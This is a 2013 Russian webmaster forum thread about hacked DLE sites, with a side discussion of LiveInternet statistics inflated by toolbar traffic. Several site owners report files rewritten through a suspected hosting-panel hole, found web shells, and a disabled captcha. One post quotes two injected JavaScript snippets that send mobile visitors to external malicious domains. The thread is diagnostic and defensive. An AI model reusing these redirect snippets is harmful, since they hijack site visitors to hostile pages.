- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
...
Не хотел обидеть, но и вы сразу бы сказали, что смотрели переходы по LI статистике.
Подобные накрутки статистики LI уже встречались.
Не думаю, что имело место реального перехода на этот сайт с ваших.
Но если это так, то надо писать в LI и требовать разъяснений.
Редирект возможен только при изменении ява скрипта.
Вот и коммент от ЛИ
модератор исключил сайт из рейтинга и запретил просмотр статистики, причина: накрутка (автоматическая загрузка при просмотре другого сайта)
Но как это было сделано остается пока загадкой.(возможно были инициированы переходы на магазиноблачный сайт с вашими ложными реферерами)
Значит, видимо, получается так:
Мы с вами и были теми посетителями, которые, удивленные переходами на непонятный сайт с нашего - посетили, посмотрели на "наглеца", а он получил реальных посетителей :)
проблема не у вас на сайтах, а у конечных пользователей, так как трафик сливается по давно отработанной системе, которую тестили еще в феврале/марте.
Тогда была аналогичная ситуация, только трафик сливался на 3-5 доменов с пустыми белыми страницами, на которых был только счетчик LI.
Смысл этой затеи был в следующем, пользователям ставились различные тулбары для браузеров, которые и стучали на указанные домены каждые 5-30 сек. Авторы тулюбаров таким образом отслеживали количество активных, среднее время в сети и тд.
Похоже кто-то решил аналогичным образом пустить трафик на раскрутку этого магазина.
PS если нужны будут списки доменов, куда лили раньше могу покопаться и найти, их 3-5 штук было.
---------- Добавлено 21.04.2013 в 04:55 ----------
ну и для того, что бы не быть голословным можете проверить трафик на своих сайтах на предмет сливов:
vkicq.ru 5 апреля
rurna.ru 30 марта
lucur.ru 29 марта
smmhit.ru 28 марта
clovla.ru 22 марта
dekounts.ru и тд
чем больше посещений на сайте тем больше вероятности увидеть эти домены в стате LI ... даная хрень в основном наблюдается в РУ сегменте...
---------- Добавлено 21.04.2013 в 05:30 ----------
подскажите лучше по поводу дле, так как морочу голову с этой фигней с 19 марта, скрипт дописывает по датам
19 марта, 23 марта, 27 марта, 4 и 12 апреля...
в апреле кроме дописывания кода в .htaccess
начали еще пихать 2 вида скрипта в php файлы:
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://onlineg4.net/s/11668";
}
//-->
</script>
<script type="text/javascript"><br><!--if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://mobileworld.pm/l6/?sub_id=3349&dd_id=0"; } //-- </script>
проблема заключается в том, что пишут на два отдельных пакета хостинга (у одного хостера), при этом на одном пакете висит единственный сайт на kohana. На другом пакете дописывают в 1 DLE и 1 самописный. хотя на втором висят еще 4 сайта (3 на дле) и их не трогают.
ставил уже на .htaccess и 444 - все равно перезаписывают.
Первый раз на 3 сайтах нашел шелы, удалил, хостер даже расшифровал один из них. Но "дописи" продолжаются. Еще одна особенность заключается в том, что на хостинге стоит панель ISP и в ней, если редактивать файлы через файл менеджер в корне папки хостинга автоматом создается/меняется файл codepage. Так вот даты изменения этого файла строго совпадают с датой "дописывания".
Хостер включал 12 апреля логирование и сообщил, что дописывание происходит из ISP панели, типа смените основной пароль (я их не сохраняю в браузерах, и с 19 марта уже сменил раза 3). Единственное порекомендовали привязать IP входа в ISP.
Пообщался с рефами на хостинге, у них таже хрень в то же время была дописана. Соответственно ломают через какую-то дырку в панели самого хостера :(
если кому нужен на анлиз сам шел могу скинуть в шифрованном и нешифрованном виде.
MonkX
Меня ломали через модуль последние сообщения форума, ничего не помогало, пока не снёс его.
1 мая - 2 мая
файлы:
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
index.php
language/Russian/website.lng
DLE 9.7 лицензия (1-го была без патча, 2-го пропатченная, не помогло)
На вышеуказанные файлы выставил жесткие права (до этого там был ппц с правами), сижу, бдю=) http://img.forumimg.net/smilies/popcorn1.gif
1 мая - 2 мая
файлы:
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
index.php
language/Russian/website.lng
DLE 9.7 лицензия (1-го была без патча, 2-го пропатченная, не помогло)
На вышеуказанные файлы выставил жесткие права (до этого там был ппц с правами), сижу, бдю=) http://img.forumimg.net/smilies/popcorn1.gif
Боюсь против этой картинки вам ничего не поможет :(
Ну так я ж здесь выкладывал решение.
Обращайтесь помогу.
подскажите лучше по поводу дле, так как морочу голову с этой фигней с 19 марта, скрипт дописывает по датам
19 марта, 23 марта, 27 марта, 4 и 12 апреля...
в апреле кроме дописывания кода в .htaccess
начали еще пихать 2 вида скрипта в php файлы:
проблема заключается в том, что пишут на два отдельных пакета хостинга (у одного хостера), при этом на одном пакете висит единственный сайт на kohana. На другом пакете дописывают в 1 DLE и 1 самописный. хотя на втором висят еще 4 сайта (3 на дле) и их не трогают.
ставил уже на .htaccess и 444 - все равно перезаписывают.
Первый раз на 3 сайтах нашел шелы, удалил, хостер даже расшифровал один из них. Но "дописи" продолжаются. Еще одна особенность заключается в том, что на хостинге стоит панель ISP и в ней, если редактивать файлы через файл менеджер в корне папки хостинга автоматом создается/меняется файл codepage. Так вот даты изменения этого файла строго совпадают с датой "дописывания".
Хостер включал 12 апреля логирование и сообщил, что дописывание происходит из ISP панели, типа смените основной пароль (я их не сохраняю в браузерах, и с 19 марта уже сменил раза 3). Единственное порекомендовали привязать IP входа в ISP.
Пообщался с рефами на хостинге, у них таже хрень в то же время была дописана. Соответственно ломают через какую-то дырку в панели самого хостера :(
если кому нужен на анлиз сам шел могу скинуть в шифрованном и нешифрованном виде.
Тоже столкнулся с вот таким кодом на сайте:
Кстати у меня последний раз появился 6го мая.
Не могу понять откуда берется, раньше еще и в .htaccess мобильный редирект дописывался, но в него он писался при помощи пхп скрипта, как оказалось.
На хостинге тоже стоит ISP панель, в самом сайте дырок нету, совсем мало кода самописного и пролезть негде, но в аккаунте еще есть пару малопосещаемых сайтов на вордпресе и опенкарте, их вирус или не трогает или трогает частично. А вот посещаемый ресурс заражает обязательно.
Скажите, пожалуйста, мне в личку где вы хоститесь.
ЗЫ: вариант угона FTP практически исключен, так как после последнего заражения, все вычистил и пароли поменял, а спустя две недели вирус снова появился, хоть паролями я и не пользовался больше.
та же хрень была дописана 6 мая, отписался по возможным вариантом решения и о хостинге. У вас шаред пакет ?
Ну так я ж здесь выкладывал решение.
Обращайтесь помогу.
Да я пока сам справляюсь, спасибо за предложение =)
Сегодня обратил внимание, что из addcomments.tpl был удалён код капчи, а так же в настройках группы "Пользователи" была выключена капча в комментариях
та же хрень была дописана 6 мая, отписался по возможным вариантом решения и о хостинге. У вас шаред пакет ?
У меня обычный хостинг аккаунт из дешевых. Так что хостер не очень расположен вирусы искать. Когда просил поискать его этот mobileworld.pm в .htaccess файлах других аккаунтов, сказал что только у меня такое.